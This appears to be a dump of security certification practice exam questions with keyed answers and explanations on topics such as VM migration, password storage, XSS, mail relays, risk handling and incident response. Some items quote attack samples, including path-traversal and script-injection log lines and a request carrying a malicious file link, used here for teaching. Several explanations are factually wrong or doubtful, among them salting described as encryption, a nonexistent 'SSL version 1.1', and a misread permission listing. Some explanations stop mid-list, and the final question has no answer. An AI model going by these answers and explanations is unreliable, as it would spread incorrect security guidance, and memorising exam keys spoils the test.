QUESTION NO: 31 A security administrator is performing VDI traffic data collection on a virtual server which migrates from one host to another. While reviewing the data collected by the protocol analyzer, the security administrator notices that sensitive data is present in the packet capture. Which of the following should the security administrator recommend to ensure the confidentiality of sensitive information during live VM migration, while minimizing latency issues? A. A separate physical interface placed on a private VLAN should be configured for live host operations. B. Database record encryption should be used when storing sensitive information on virtual servers. C. Full disk encryption should be enabled across the enterprise to ensure the confidentiality of sensitive data. D. Sensitive data should be stored on a backend SAN which uses an isolated fiber channel network.

Answer: A Explanation: VDI virtual machines can be migrated across physical hosts while the virtual machines are still powered on. In VMware, this is called vMotion. In Microsoft Hyper-V, this is called Live Migration. When a virtual machine is migrated between hosts, the data is unencrypted as it travels across the network. To prevent access to the data as it travels across the network, a dedicated network should be created for virtual machine migrations. The dedicated migration network should only be accessible by the virtual machine hosts to maximize security.

QUESTION NO: 40 An administrator has enabled salting for users' passwords on a UNIX box. A penetration tester must attempt to retrieve password hashes. Which of the following files must the penetration tester use to eventually obtain passwords on the system? (Select TWO). A. /etc/passwd B. /etc/shadow C. /etc/security D. /etc/password E. /sbin/logon F. /bin/bash

Answer: A,B Explanation: In cryptography, a salt is random data that is used as an additional input to a one-way function that hashes a password or passphrase. In this question, enabling salting for users' passwords means to store the passwords in an encrypted format. Traditional Unix systems keep user account information, including one-way encrypted passwords, in a text file called ``/etc/passwd''. As this file is used by many tools (such as ``ls'') to display file ownerships, etc. by matching user id #'s with the user's names, the file needs to be worldreadable. Consequentially, this can be somewhat of a security risk. Another method of storing account information is with the shadow password format. As with the traditional method, this method stores account information in the /etc/passwd file in a compatible format. However, the password is stored as a single "x" character (ie. not actually stored in this file). A second file, called ``/etc/shadow'', contains encrypted password as well as other information such as account or password expiration values, etc.

QUESTION NO: 64 The Information Security Officer (ISO) is reviewing new policies that have been recently made effective and now apply to the company. Upon review, the ISO identifies a new requirement to implement two-factor authentication on the company's wireless system. Due to budget constraints, the company will be unable to implement the requirement for the next two years. The ISO is required to submit a policy exception form to the Chief Information Officer (CIO). Which of the following are MOST important to include when submitting the exception form? (Select THREE). A. Business ortechnical justification for not implementing the requirements. B. Risks associated with the inability to implement the requirements. C. Industry best practices with respect to the technical implementation of the current controls. D. All sections of the policy that may justify non-implementation of the requirements. E. A revised DRP and COOP plan to the exception form. F. Internal procedures that may justify a budget submission to implement the new requirement. G. Current and planned controls to mitigate the risks.

Answer: A,B,G Explanation: The Exception Request must include:

QUESTION NO: 81 The source workstation image for new accounting PCs has begun blue-screening. A technician notices that the date/time stamp of the image source appears to have changed. The desktop support director has asked the Information Security department to determine if any changes were made to the source image. Which of the following methods would BEST help with this process? (Select TWO). A. Retrieve source system image from backup and run file comparison analysis on the two images. B. Parse all images to determine if extra data is hidden using steganography. C. Calculate a new hash and compare it with the previously captured image hash. D. Ask desktop support if any changes to the images were made. E. Check key system files to see if date/time stamp is in the past six months.

Answer: A,C Explanation: Running a file comparison analysis on the two images will determine whether files have been changed, as well as what files were changed. Hashing can be used to meet the goals of integrity and non-repudiation. One of its advantages of hashing is its ability to verify that information has remained unchanged. If the hash values are the same, then the images are the same. If the hash values differ, there is a difference between the two images.

QUESTION NO: 32 A penetration tester is inspecting traffic on a new mobile banking application and sends the following web request: POST http://www.example.com/resources/NewBankAccount HTTP/1.1 Content-type: application/json { "account": [ { "creditAccount":"Credit Card Rewards account"} { "salesLeadRef":"www.example.com/badcontent/exploitme.exe"} ], "customer": [ { "name":"Joe Citizen"} { "custRef":"3153151"} ] } The banking website responds with: HTTP/1.1 200 OK { "newAccountDetails": [ { "cardNumber":"1234123412341234"} { "cardExpiry":"2020-12-31"} { "cardCVV":"909"} ], "marketingCookieTracker":"JSESSIONID=000000001" "returnCode":"Account added successfully" } Which of the following are security weaknesses in this example? (Select TWO). A. Missing input validation on some fields B. Vulnerable to SQL injection C. Sensitive details communicated in clear-text D. Vulnerable to XSS E. Vulnerable to malware file uploads F. JSON/REST is not as secure as XML

Answer: A,C Explanation: The SalesLeadRef field has no input validation. The penetration tester should not be able to enter "www.example.com/badcontent/exploitme.exe" in this field. The credit card numbers are communicated in clear text which makes it vulnerable to an attacker. This kind of information should be encrypted.

QUESTION NO: 35 An organization has implemented an Agile development process for front end web application development. A new security architect has just joined the company and wants to integrate security activities into the SDLC. Which of the following activities MUST be mandated to ensure code quality from a security perspective? (Select TWO). A. tatic and dynamic analysis is run as part of integration B. Security standards and training is performed as part of the project C. Daily stand-up meetings are held to ensure security requirements are understood D. For each major iteration penetration testing is performed E. Security requirements are story boarded and make it into the build F. A security design is performed at the end of the requirements phase

Answer: A,D Explanation: SDLC stands for systems development life cycle. An agile project is completed in small sections called iterations. Each iteration is reviewed and critiqued by the project team. Insights gained from the critique of an iteration are used to determine what the next step should be in the project. Each project iteration is typically scheduled to be completed within two weeks. Static and dynamic security analysis should be performed throughout the project. Static program analysis is the analysis of computer software that is performed without actually executing programs (analysis performed on executing programs is known as dynamic analysis). In most cases the analysis is performed on some version of the source code, and in the other cases, some form of the object code. For each major iteration penetration testing is performed. The output of a major iteration will be a functioning part of the application. This should be penetration tested to ensure security of the application.

QUESTION NO: 90 Wireless users are reporting issues with the company's video conferencing and VoIP systems. The security administrator notices internal DoS attacks from infected PCs on the network causing the VoIP system to drop calls. The security administrator also notices that the SIP servers are unavailable during these attacks. Which of the following security controls will MOST likely mitigate the VoIP DoS attacks on the network? (Select TWO). A. Install a HIPS on the SIP servers B. Configure 802.1X on the network C. Update the corporate firewall to block attacking addresses D. Configure 802.11e on the network E. Configure 802.1q on the network

Answer: A,D Explanation: Host-based intrusion prevention system (HIPS) is an installed software package that will monitor a single host for suspicious activity by analyzing events taking place within that host. IEEE 802.11e is deemed to be of significant consequence for delay-sensitive applications, such as Voice over Wireless LAN and streaming multimedia.

QUESTION NO: 75 A large hospital has implemented BYOD to allow doctors and specialists the ability to access patient medical records on their tablets. The doctors and specialists access patient records over the hospital's guest WiFi network which is isolated from the internal network with appropriate security controls. The patient records management system can be accessed from the guest network and require two factor authentication. Using a remote desktop type interface, the doctors and specialists can interact with the hospital's system. Cut and paste and printing functions are disabled to prevent the copying of data to BYOD devices. Which of the following are of MOST concern? (Select TWO). A. Privacy could be compromised as patient records can be viewed in uncontrolled areas. B. Device encryption has not been enabled and will result in a greater likelihood of data loss. C. The guest WiFi may be exploited allowing non-authorized individuals access to confidential patient data. D. Malware may be on BYOD devices which can extract data via key logging and screen scrapes. E. Remote wiping of devices should be enabled to ensure any lost device is rendered inoperable.

Answer: A,D Explanation: Privacy could be compromised because patient records can be from a doctor's personal device. This can then be shown to persons not authorized to view this information. Similarly, the doctor's personal device could have malware on it.

QUESTION NO: 22 The security administrator finds unauthorized tables and records, which were not present before, on a Linux database server. The database server communicates only with one web server, which connects to the database server via an account with SELECT only privileges. Web server logs show the following: 90.76.165.40 - - [08/Mar/2014:10:54:04] "GET calendar.php?create%20table%20hidden HTTP/1.1" 200 5724 90.76.165.40 - - [08/Mar/2014:10:54:05] "GET ../../../root/.bash_history HTTP/1.1" 200 5724 90.76.165.40 - - [08/Mar/2014:10:54:04] "GET index.php?user=<script>Create</script> HTTP/1.1" 200 5724 The security administrator also inspects the following file system locations on the database server using the command 'ls -al /root' drwxrwxrwx 11 root root 4096 Sep 28 22:45 . drwxr-xr-x 25 root root 4096 Mar 8 09:30 .. -rws------ 25 root root 4096 Mar 8 09:30 .bash_history -rw------- 25 root root 4096 Mar 8 09:30 .bash_history -rw------- 25 root root 4096 Mar 8 09:30 .profile -rw------- 25 root root 4096 Mar 8 09:30 .ssh Which of the following attacks was used to compromise the database server and what can the security administrator implement to detect such attacks in the future? (Select TWO). A. Privilege escalation B. Brute force attack C. SQL injection D. Cross-site scripting E. Using input validation, ensure the following characters are sanitized: <> F. Update crontab with: find / \( -perm -4000 \) -type f -print0 | xargs -0 ls -l | email.sh G. Implement the following PHP directive: $clean_user_input = addslashes($user_input) H. Set an account lockout policy

Answer: A,F Explanation: This is an example of privilege escalation. Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The question states that the web server communicates with the database server via an account with SELECT only privileges. However, the privileges listed include read, write and execute (rwx). This suggests the privileges have been 'escalated'. Now that we know the system has been attacked, we should investigate what was done to the system. The command "Update crontab with: find / \( -perm -4000 \) -type f -print0 | xargs -0 ls -l | email.sh" is used to find all the files that are setuid enabled. Setuid means set user ID upon execution. If the setuid bit is turned on for a file, the user executing that executable file gets the permissions of the individual or group that owns the file.

QUESTION NO: 97 Company policy requires that all unsupported operating systems be removed from the network. The security administrator is using a combination of network based tools to identify such systems for the purpose of disconnecting them from the network. Which of the following tools, or outputs from the tools in use, can be used to help the security administrator make an approximate determination of the operating system in use on the local company network? (Select THREE). A. Passive banner grabbing B. Password cracker C. http://www.company.org/documents_private/index.php?search=string#&topic=windows&tcp=pack et%20capture&cookie=wokdjwalkjcnie61lkasdf2aliser4 D. 443/tcp open http E. dig host.company.com F. 09:18:16.262743 IP (tos 0x0, ttl 64, id 9870, offset 0, flags [none], proto TCP (6), length 40) 192.168.1.3.1051 > 10.46.3.7.80: Flags [none], cksum 0x1800 (correct), win 512, length 0 G. Nmap

Answer: A,F,G Explanation: Banner grabbing and operating system identification can also be defined as fingerprinting the TCP/IP stack. Banner grabbing is the process of opening a connection and reading the banner or response sent by the application. The output displayed in option F includes information commonly examined to fingerprint the OS. Nmap provides features that include host discovery, as well as service and operating system detection.

QUESTION NO: 17 A security administrator wants to deploy a dedicated storage solution which is inexpensive, can natively integrate with AD, allows files to be selectively encrypted and is suitable for a small number of users at a satellite office. Which of the following would BEST meet the requirement? A. SAN B. NAS C. Virtual SAN D. Virtual storage

Answer: B Explanation: A NAS is an inexpensive storage solution suitable for small offices. Individual files can be encrypted by using the EFS (Encrypted File System) functionality provided by the NTFS file system. NAS typically uses a common Ethernet network and can provide storage services to any authorized devices on that network. Two primary NAS protocols are used in most environments. The choice of protocol depends largely on the type of computer or server connecting to the storage. Network File System (NFS) protocol usually used by servers to access storage in a NAS environment. Common Internet File System (CIFS), also sometimes called Server Message Block (SMB), is usually used for desktops, especially those running Microsoft Windows. Unlike DAS and SAN, NAS is a file-level storage technology. This means the NAS appliance maintains and controls the files, folder structures, permission, and attributes of the data it holds. A typical NAS deployment integrates the NAS appliance with a user database, such as Active Directory, so file permissions can be assigned based on established users and groups. With Active Directory integration, most Windows New Technology File System (NTFS) permissions can be set on the files contained on a NAS device.

QUESTION NO: 86 It has come to the IT administrator's attention that the "post your comment" field on the company blog page has been exploited, resulting in cross-site scripting attacks against customers reading the blog. Which of the following would be the MOST effective at preventing the "post your comment" field from being exploited? A. Update the blog page to HTTPS B. Filter metacharacters C. Install HIDS on the server D. Patch the web application E. Perform client side input validation

Answer: B Explanation: A general rule of thumb with regards to XSS is to "Never trust user input and always filter metacharacters."

QUESTION NO: 43 A company decides to purchase commercially available software packages. This can introduce new security risks to the network. Which of the following is the BEST description of why this is true? A. Commercially available software packages are typically well known and widely available. Information concerning vulnerabilities and viable attack patterns are never revealed by the developer to avoid lawsuits. B. Commercially available software packages are often widely available. Information concerning vulnerabilities is often kept internal to the company that developed the software. C. Commercially available software packages are not widespread and are only available in limited areas. Information concerning vulnerabilities is often ignored by business managers. D. Commercially available software packages are well known and widely available. Information concerning vulnerabilities and viable attack patterns are always shared within the IT community.

Answer: B Explanation: Commercially available software packages are often widely available. Huge companies like Microsoft develop software packages that are widely available and in use on most computers. Most companies that develop commercial software make their software available through many commercial outlets (computer stores, online stores etc). Information concerning vulnerabilities is often kept internal to the company that developed the software. The large companies that develop commercial software packages are accountable for the software. Information concerning vulnerabilities being made available could have a huge financial cost to the company in terms of loss of reputation and lost revenues. Information concerning vulnerabilities is often kept internal to the company at least until a patch is available to fix the vulnerability.

QUESTION NO: 78 The Chief Executive Officer (CEO) of a company that allows telecommuting has challenged the Chief Security Officer's (CSO) request to harden the corporate network's perimeter. The CEO argues that the company cannot protect its employees at home, so the risk at work is no different. Which of the following BEST explains why this company should proceed with protecting its corporate network boundary? A. The corporate network is the only network that is audited by regulators and customers. B. The aggregation of employees on a corporate network makes it a more valuable target for attackers. C. Home networks are unknown to attackers and less likely to be targeted directly. D. Employees are more likely to be using personal computers for general web browsing when they are at home.

Answer: B Explanation: Data aggregation is any process in which information is gathered and expressed in a summary form, for purposes such as statistical analysis. Data aggregation increases the impact and scale of a security breach. The amount of data aggregation on the corporate network is much more that on an employee's home network, and is therefore more valuable.

QUESTION NO: 7 The administrator is troubleshooting availability issues on an FCoE-based storage array that uses deduplication. The single controller in the storage array has failed, so the administrator wants to move the drives to a storage array from a different manufacturer in order to access the data. Which of the following issues may potentially occur? A. The data may not be in a usable format. B. The new storage array is not FCoE based. C. The data may need a file system check. D. The new storage array also only has a single controller.

Answer: B Explanation: Fibre Channel over Ethernet (FCoE) is a computer network technology that encapsulates Fibre Channel frames over Ethernet networks. This allows Fibre Channel to use 10 Gigabit Ethernet networks (or higher speeds) while preserving the Fibre Channel protocol. When moving the disks to another storage array, you need to ensure that the array supports FCoE, not just regular Fiber Channel. Fiber Channel arrays and Fiber Channel over Ethernet arrays use different network connections, hardware and protocols. Fiber Channel arrays use the Fiber Channel protocol over a dedicated Fiber Channel network whereas FCoE arrays use the Fiber Channel protocol over an Ethernet network.

QUESTION NO: 50 A senior network security engineer has been tasked to decrease the attack surface of the corporate network. Which of the following actions would protect the external network interfaces from external attackers performing network scanning? A. Remove contact details from the domain name registrar to prevent social engineering attacks. B. Test external interfaces to see how they function when they process fragmented IP packets. C. Enable a honeynet to capture and facilitate future analysis of malicious attack vectors. D. Filter all internal ICMP message traffic, forcing attackers to use full-blown TCP port scans against external network interfaces.

Answer: B Explanation: Fragmented IP packets are often used to evade firewalls or intrusion detection systems. Port Scanning is one of the most popular reconnaissance techniques attackers use to discover services they can break into. All machines connected to a Local Area Network (LAN) or Internet run many services that listen at well-known and not so well known ports. A port scan helps the attacker find which ports are available (i.e., what service might be listing to a port). One problem, from the perspective of the attacker attempting to scan a port, is that services listening on these ports log scans. They see an incoming connection, but no data, so an error is logged. There exist a number of stealth scan techniques to avoid this. One method is a fragmented port scan. The fragmented packet port scanner splits the TCP header into several IP fragments. This bypasses some packet filter firewalls because they cannot see a complete TCP header that can match their filter rules. Some packet filters and firewalls do queue all IP fragments, but many networks cannot afford the performance loss caused by the queuing.

QUESTION NO: 60 An insurance company is looking to purchase a smaller company in another country. Which of the following tasks would the security administrator perform as part of the security due diligence? A. Review switch and router configurations B. Review the security policies and standards C. Perform a network penetration test D. Review the firewall rule set and IPS logs

Answer: B Explanation: IT security professionals should have a chance to review the security controls and practices of a company targeted for acquisition. Any irregularities that are found should be reported to management so that expenses and concerns are properly identified.

QUESTION NO: 14 An application present on the majority of an organization's 1,000 systems is vulnerable to a buffer overflow attack. Which of the following is the MOST comprehensive way to resolve the issue? A. Deploy custom HIPS signatures to detect and block the attacks. B. Validate and deploy the appropriate patch. C. Run the application in terminal services to reduce the threat landscape. D. Deploy custom NIPS signatures to detect and block the attacks.

Answer: B Explanation: If an application has a known issue (such as susceptibility to buffer overflow attacks) and a patch is released to resolve the specific issue, then the best solution is always to deploy the patch. A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information - which has to go somewhere - can overflow into adjacent buffers, corrupting or overwriting the valid data held in them. Although it may occur accidentally through programming error, buffer overflow is an increasingly common type of security attack on data integrity. In buffer overflow attacks, the extra data may contain codes designed to trigger specific actions, in effect sending new instructions to the attacked computer that could, for example, damage the user's files, change data, or disclose confidential information. Buffer overflow attacks are said to have arisen because the C programming language supplied the framework, and poor programming practices supplied the vulnerability.

QUESTION NO: 95 A security auditor suspects two employees of having devised a scheme to steal money from the company. While one employee submits purchase orders for personal items, the other employee approves these purchase orders. The auditor has contacted the human resources director with suggestions on how to detect such illegal activities. Which of the following should the human resource director implement to identify the employees involved in these activities and reduce the risk of this activity occurring in the future? A. Background checks B. Job rotation C. Least privilege D. Employee termination procedures

Answer: B Explanation: Job rotation can reduce fraud or misuse by preventing an individual from having too much control over an area.

QUESTION NO: 72 Which of the following provides the BEST risk calculation methodology? A. Annual Loss Expectancy (ALE) x Value of Asset B. Potential Loss x Event Probability x Control Failure Probability C. Impact x Threat x Vulnerability D. Risk Likelihood x Annual Loss Expectancy (ALE)

Answer: B Explanation: Of the options given, the BEST risk calculation methodology would be Potential Loss x Event Probability x Control Failure Probability. This exam is about computer and data security so 'loss' caused by risk is not necessarily a monetary value. For example: Potential Loss could refer to the data lost in the event of a data storage failure. Event probability could be the risk a disk drive or drives failing. Control Failure Probability could be the risk of the storage RAID not being able to handle the number of failed hard drives without losing data.

QUESTION NO: 2 Company ABC's SAN is nearing capacity, and will cause costly downtimes if servers run out disk space. Which of the following is a more cost effective alternative to buying a new SAN? A. Enable multipath to increase availability B. Enable deduplication on the storage pools C. Implement snapshots to reduce virtual disk size D. Implement replication to offsite datacenter

Answer: B Explanation: Storage-based data deduplication reduces the amount of storage needed for a given set of files. It is most effective in applications where many copies of very similar or even identical data are stored on a single disk. It is common for multiple copies of files to exist on a SAN. By eliminating (deduplicating) repeated copies of the files, we can reduce the disk space used on the existing SAN. This solution is a cost effective alternative to buying a new SAN.

QUESTION NO: 70 A security manager for a service provider has approved two vendors for connections to the service provider backbone. One vendor will be providing authentication services for its payment card service, and the other vendor will be providing maintenance to the service provider infrastructure sites. Which of the following business agreements is MOST relevant to the vendors and service provider's relationship? A. Memorandum of Agreement B. Interconnection Security Agreement C. Non-Disclosure Agreement D. Operating Level Agreement

Answer: B Explanation: The Interconnection Security Agreement (ISA) is a document that identifies the requirements for connecting systems and networks and details what security controls are to be used to protect the systems and sensitive data.

QUESTION NO: 69 A large organization has recently suffered a massive credit card breach. During the months of Incident Response, there were multiple attempts to assign blame for whose fault it was that the incident occurred. In which part of the incident response phase would this be addressed in a controlled and productive manner? A. During the Identification Phase B. During the Lessons Learned phase C. During the Containment Phase D. During the Preparation Phase

Answer: B Explanation: The Lessons Learned phase is the final step in the Incident Response process, when everyone involved reviews what happened and why.

QUESTION NO: 1 An administrator wants to enable policy based flexible mandatory access controls on an open source OS to prevent abnormal application modifications or executions. Which of the following would BEST accomplish this? A. Access control lists B. SELinux C. IPtables firewall D. HIPS

Answer: B Explanation: The most common open source operating system is LINUX. Security-Enhanced Linux (SELinux) was created by the United States National Security Agency (NSA) and is a Linux kernel security module that provides a mechanism for supporting access control security policies, including United States Department of Defense-style mandatory access controls (MAC). NSA Security-enhanced Linux is a set of patches to the Linux kernel and some utilities to incorporate a strong, flexible mandatory access control (MAC) architecture into the major subsystems of the kernel. It provides an enhanced mechanism to enforce the separation of information based on confidentiality and integrity requirements, which allows threats of tampering and bypassing of application security mechanisms to be addressed and enables the confinement of damage that can be caused by malicious or flawed applications.

QUESTION NO: 39 A pentester must attempt to crack passwords on a windows domain that enforces strong complex passwords. Which of the following would crack the MOST passwords in the shortest time period? A. Online password testing B. Rainbow tables attack C. Dictionary attack D. Brute force attack

Answer: B Explanation: The passwords in a Windows (Active Directory) domain are encrypted. When a password is "tried" against a system it is "hashed" using encryption so that the actual password is never sent in clear text across the communications line. This prevents eavesdroppers from intercepting the password. The hash of a password usually looks like a bunch of garbage and is typically a different length than the original password. Your password might be "shitzu" but the hash of your password would look something like "7378347eedbfdd761619451949225ec1". To verify a user, a system takes the hash value created by the password hashing function on the client computer and compares it to the hash value stored in a table on the server. If the hashes match, then the user is authenticated and granted access. Password cracking programs work in a similar way to the login process. The cracking program starts by taking plaintext passwords, running them through a hash algorithm, such as MD5, and then compares the hash output with the hashes in the stolen password file. If it finds a match then the program has cracked the password. Rainbow Tables are basically huge sets of precomputed tables filled with hash values that are prematched to possible plaintext passwords. The Rainbow Tables essentially allow hackers to reverse the hashing function to determine what the plaintext password might be. The use of Rainbow Tables allow for passwords to be cracked in a very short amount of time compared with brute-force methods, however, the trade-off is that it takes a lot of storage (sometimes Terabytes) to hold the Rainbow Tables themselves.

QUESTION NO: 77 A forensic analyst receives a hard drive containing malware quarantined by the antivirus application. After creating an image and determining the directory location of the malware file, which of the following helps to determine when the system became infected? A. The malware file's modify, access, change time properties. B. The timeline analysis of the file system. C. The time stamp of the malware in the swap file. D. The date/time stamp of the malware detection in the antivirus logs.

Answer: B Explanation: Timelines can be used in digital forensics to identify when activity occurred on a computer. Timelines are mainly used for data reduction or identifying specific state changes that have occurred on a computer.

QUESTION NO: 65 The Chief Information Officer (CIO) is reviewing the IT centric BIA and RA documentation. The documentation shows that a single 24 hours downtime in a critical business function will cost the business $2.3 million. Additionally, the business unit which depends on the critical business function has determined that there is a high probability that a threat will materialize based on historical data. The CIO's budget does not allow for full system hardware replacement in case of a catastrophic failure, nor does it allow for the purchase of additional compensating controls. Which of the following should the CIO recommend to the finance director to minimize financial loss? A. The company should mitigate the risk. B. The company should transfer the risk. C. The company should avoid the risk. D. The company should accept the risk.

Answer: B Explanation: To transfer the risk is to deflect it to a third party, by taking out insurance for example.

QUESTION NO: 27 Company ABC is hiring customer service representatives from Company XYZ. The representatives reside at Company XYZ's headquarters. Which of the following BEST prevents Company XYZ representatives from gaining access to unauthorized Company ABC systems? A. Require each Company XYZ employee to use an IPSec connection to the required systems B. Require Company XYZ employees to establish an encrypted VDI session to the required systems C. Require Company ABC employees to use two-factor authentication on the required systems D. Require a site-to-site VPN for intercompany communications

Answer: B Explanation: VDI stands for Virtual Desktop Infrastructure. Virtual desktop infrastructure is the practice of hosting a desktop operating system within a virtual machine (VM) running on a centralized server. Company ABC can configure virtual desktops with the required restrictions and required access to systems that the users in company XYZ require. The users in company XYZ can then log in to the virtual desktops over a secure encrypted connection and then access authorized systems only.

QUESTION NO: 28 A vulnerability scanner report shows that a client-server host monitoring solution operating in the credit card corporate environment is managing SSL sessions with a weak algorithm which does not meet corporate policy. Which of the following are true statements? (Select TWO). A. The X509 V3 certificate was issued by a non-trusted public CA. B. The client-server handshake could not negotiate strong ciphers. C. The client-server handshake is configured with a wrong priority. D. The client-server handshake is based on TLS authentication. E. The X509 V3 certificate is expired. F. The client-server implements client-server mutual authentication with different certificates.

Answer: B,C Explanation: The client-server handshake could not negotiate strong ciphers. This means that the system is not configured to support the strong ciphers provided by later versions of the SSL protocol. For example, if the system is configured to support only SSL version 1.1, then only a weak cipher will be supported. The client-server handshake is configured with a wrong priority. The client sends a list of SSL versions it supports and priority should be given to the highest version it supports. For example, if the client supports SSL versions 1.1, 2 and 3, then the server should use version 3. If the priority is not configured correctly (if it uses the lowest version) then version 1.1 with its weak algorithm will be used.

QUESTION NO: 20 A security administrator wants to prevent sensitive data residing on corporate laptops and desktops from leaking outside of the corporate network. The company has already implemented full-disk encryption and has disabled all peripheral devices on its desktops and laptops. Which of the following additional controls MUST be implemented to minimize the risk of data leakage? (Select TWO). A. A full-system backup should be implemented to a third-party provider with strong encryption for data in transit. B. A DLP gateway should be installed at the company border. C. Strong authentication should be implemented via external biometric devices. D. Full-tunnel VPN should be required for all network communication. E. Full-drive file hashing should be implemented with hashes stored on separate storage. F. Split-tunnel VPN should be enforced when transferring sensitive data.

Answer: B,D Explanation: Web mail, Instant Messaging and personal networking sites are some of the most common means by which corporate data is leaked. Data loss prevention (DLP) is a strategy for making sure that end users do not send sensitive or critical information outside the corporate network. The term is also used to describe software products that help a network administrator control what data end users can transfer. DLP software products use business rules to classify and protect confidential and critical information so that unauthorized end users cannot accidentally or maliciously share data whose disclosure could put the organization at risk. For example, if an employee tried to forward a business email outside the corporate domain or upload a corporate file to a consumer cloud storage service like Dropbox, the employee would be denied permission. Full-tunnel VPN should be required for all network communication. This will ensure that all data transmitted over the network is encrypted which would prevent a malicious user accessing the data by using packet sniffing.

QUESTION NO: 85 Customers are receiving emails containing a link to malicious software. These emails are subverting spam filters. The email reads as follows: Delivered-To: [email protected] Received: by 10.14.120.205 Mon, 1 Nov 2010 11:15:24 -0700 (PDT) Received: by 10.231.31.193 Mon, 01 Nov 2010 11:15:23 -0700 (PDT) Return-Path: <[email protected]> Received: from 127.0.0.1 for <[email protected]>; Mon, 1 Nov 2010 13:15:14 -0500 (envelope-from <[email protected]>) Received: by smtpex.example.com (SMTP READY) with ESMTP (AIO); Mon, 01 Nov 2010 13:15:14 -0500 Received: from 172.18.45.122 by 192.168.2.55; Mon, 1 Nov 2010 13:15:14 -0500 From: Company <[email protected]> To: "[email protected]" <[email protected]> Date: Mon, 1 Nov 2010 13:15:11 -0500 Subject: New Insurance Application Thread-Topic: New Insurance Application Please download and install software from the site below to maintain full access to your account. www.examplesite.com ________________________________ Additional information: The authorized mail servers IPs are 192.168.2.10 and 192.168.2.11. The network's subnet is 192.168.2.0/25. Which of the following are the MOST appropriate courses of action a security administrator could take to eliminate this risk? (Select TWO). A. Identify the origination point for malicious activity on the unauthorized mail server. B. Block port 25 on the firewall for all unauthorized mail servers. C. Disable open relay functionality. D. Shut down the SMTP service on the unauthorized mail server. E. Enable STARTTLS on the spam filter.

Answer: B,D Explanation: In this question, we have an unauthorized mail server using the IP: 192.168.2.55. Blocking port 25 on the firewall for all unauthorized mail servers is a common and recommended security step. Port 25 should be open on the firewall to the IP addresses of the authorized email servers only (192.168.2.10 and 192.168.2.11). This will prevent unauthorized email servers sending email or receiving and relaying email. Email servers use SMTP (Simple Mail Transfer Protocol) to send email to other email servers. Shutting down the SMTP service on the unauthorized mail server is effectively disabling the mail server functionality of the unauthorized server.

QUESTION NO: 38 ABC Company must achieve compliance for PCI and SOX. Which of the following would BEST allow the organization to achieve compliance and ensure security? (Select THREE). A. Establish a list of users that must work with each regulation B. Establish a list of devices that must meet each regulation C. Centralize management of all devices on the network D. Compartmentalize the network E. Establish a company framework F. Apply technical controls to meet compliance with the regulation

Answer: B,D,F Explanation: Payment card industry (PCI) compliance is adherence to a set of specific security standards that were developed to protect card information during and after a financial transaction. PCI compliance is required by all card brands. There are six main requirements for PCI compliance. The vendor must: To achieve PCI and SOX compliance you should:

QUESTION NO: 48 An organization uses IP address block 203.0.113.0/24 on its internal network. At the border router, the network administrator sets up rules to deny packets with a source address in this subnet from entering the network, and to deny packets with a destination address in this subnet from leaving the network. Which of the following is the administrator attempting to prevent? A. BGP route hijacking attacks B. Bogon IP network traffic C. IP spoofing attacks D. Man-in-the-middle attacks E. Amplified DDoS attacks

Answer: C Explanation: The IP address block 203.0.113.0/24 is used on the internal network. Therefore, there should be no traffic coming into the network claiming to be from an address in the 203.0.113.0/24 range. Similarly, there should be no outbound traffic destined for an address in the 203.0.113.0/24 range. So this has been blocked at the firewall. This is to protect against IP spoofing attacks where an attacker external to the network sends data claiming to be from an internal computer with an address in the 203.0.113.0/24 range. IP spoofing, also known as IP address forgery or a host file hijack, is a hijacking technique in which a cracker masquerades as a trusted host to conceal his identity, spoof a Web site, hijack browsers, or gain access to a network. Here's how it works: The hijacker obtains the IP address of a legitimate host and alters packet headers so that the legitimate host appears to be the source. When IP spoofing is used to hijack a browser, a visitor who types in the URL (Uniform Resource Locator) of a legitimate site is taken to a fraudulent Web page created by the hijacker. For example, if the hijacker spoofed the Library of Congress Web site, then any Internet user who typed in the URL www.loc.gov would see spoofed content created by the hijacker. If a user interacts with dynamic content on a spoofed page, the hijacker can gain access to sensitive information or computer or network resources. He could steal or alter sensitive data, such as a credit card number or password, or install malware. The hijacker would also be able to take control of a compromised computer to use it as part of a zombie army in order to send out spam.

QUESTION NO: 12 A popular commercial virtualization platform allows for the creation of virtual hardware. To virtual machines, this virtual hardware is indistinguishable from real hardware. By implementing virtualized TPMs, which of the following trusted system concepts can be implemented? A. Software-based root of trust B. Continuous chain of trust C. Chain of trust with a hardware root of trust D. Software-based trust anchor with no root of trust

Answer: C Explanation: A Trusted Platform Module (TPM) is a microchip designed to provide basic security-related functions, primarily involving encryption keys. The TPM is usually installed on the motherboard of a computer, and it communicates with the remainder of the system by using a hardware bus. A vTPM is a virtual Trusted Platform Module; a virtual instance of the TPM. IBM extended the current TPM V1.2 command set with virtual TPM management commands that allow us to create and delete instances of TPMs. Each created instance of a TPM holds an association with a virtual machine (VM) throughout its lifetime on the platform. The TPM is the hardware root of trust. Chain of trust means to extend the trust boundary from the root(s) of trust, in order to extend the collection of trustworthy functions. Implies/entails transitive trust. Therefore a virtual TPM is a chain of trust from the hardware TPM (root of trust).

QUESTION NO: 87 A user is suspected of engaging in potentially illegal activities. Law enforcement has requested that the user continue to operate on the network as normal. However, they would like to have a copy of any communications from the user involving certain key terms. Additionally, the law enforcement agency has requested that the user's ongoing communication be retained in the user's account for future investigations. Which of the following will BEST meet the goals of law enforcement? A. Begin a chain-of-custody on for the user's communication. Next, place a legal hold on the user's email account. B. Perform an e-discover using the applicable search terms. Next, back up the user's email for a future investigation. C. Place a legal hold on the user's email account. Next, perform e-discovery searches to collect applicable emails. D. Perform a back up of the user's email account. Next, export the applicable emails that match the search terms.

Answer: C Explanation: A legal hold is a process that an organization uses to maintain all forms of pertinent information when legal action is reasonably expected. E-discovery refers to discovery in litigation or government investigations that manages the exchange of electronically stored information (ESI). ESI includes email and office documents, photos, video, databases, and other filetypes.

QUESTION NO: 36 ABC Corporation uses multiple security zones to protect systems and information, and all of the VM hosts are part of a consolidated VM infrastructure. Each zone has different VM administrators. Which of the following restricts different zone administrators from directly accessing the console of a VM host from another zone? A. Ensure hypervisor layer firewalling between all VM hosts regardless of security zone. B. Maintain a separate virtual switch for each security zone and ensure VM hosts bind to only the correct virtual NIC(s). C. Organize VM hosts into containers based on security zone and restrict access using an ACL. D. Require multi-factor authentication when accessing the console at the physical VM host.

